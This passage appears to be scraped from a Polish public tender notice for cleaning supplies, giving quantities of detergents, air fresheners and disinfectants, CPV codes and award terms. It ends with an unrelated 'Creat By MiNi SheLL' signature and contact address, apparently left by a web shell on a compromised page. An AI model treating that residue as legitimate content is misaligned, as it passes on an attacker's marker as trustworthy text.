1.Koncentrat czyszcząco-odtłuszczający do mycia i czyszczenia silnie zabrudzonych powierzchni. Opakowanie 5 l. - 60 szt,
2.Mydło w płynie do mycia rąk.  Opakowanie 5l.	- 30 szt,
3.Mleczko do czyszczenia umywalek i urządzeń sanitarnych Pojemność max. 1000 ml. - 100 szt,
4.Odświeżacz powietrza w żelu. Waga min. 150 g. - 50 szt,
5.Odświeżacz powietrza w spray-u, Opakowanie 300 ml. - 50 szt,
6.Płyn biobójczy do czyszczenia, wybielania  i dezynfekcji urządzeń i pomieszczeń sanitarnych. Opakowanie 500 ml. - 50 szt,
7.Płyn do mycia podłóg, ścian, kafelków w opakowaniu 1l. - 100 szt,
8.Pianka w aerozolu do czyszczenia i konserwacji mebli. Opakowanie 250 ml.  - 30 szt,
9.Płyn do mycia szyb i luster, Opakowanie 500 ml. - 250 szt,
10. Proszek do czyszczenia glazury, terakoty, zlewozmywaków, urządzeń sanitarnych. Opakowanie 1 kg. - 150 szt,
11. Płyn do czyszczenia urządzeń sanitarnych  i armatury chromowanej. Opakowanie 500 ml	 - 100 szt,
12. Preparat do odtłuszczania wszelkiego rodzaju powierzchni zanieczyszczonych. Opakowanie 10 l. - 30 szt,
Szczegółowy opis przedmiotu zamówienia określono w załączniku nr 1c do SIWZ.
Termin realizacji zamówienia - do 30 dni od daty podpisania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 33.71.19.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com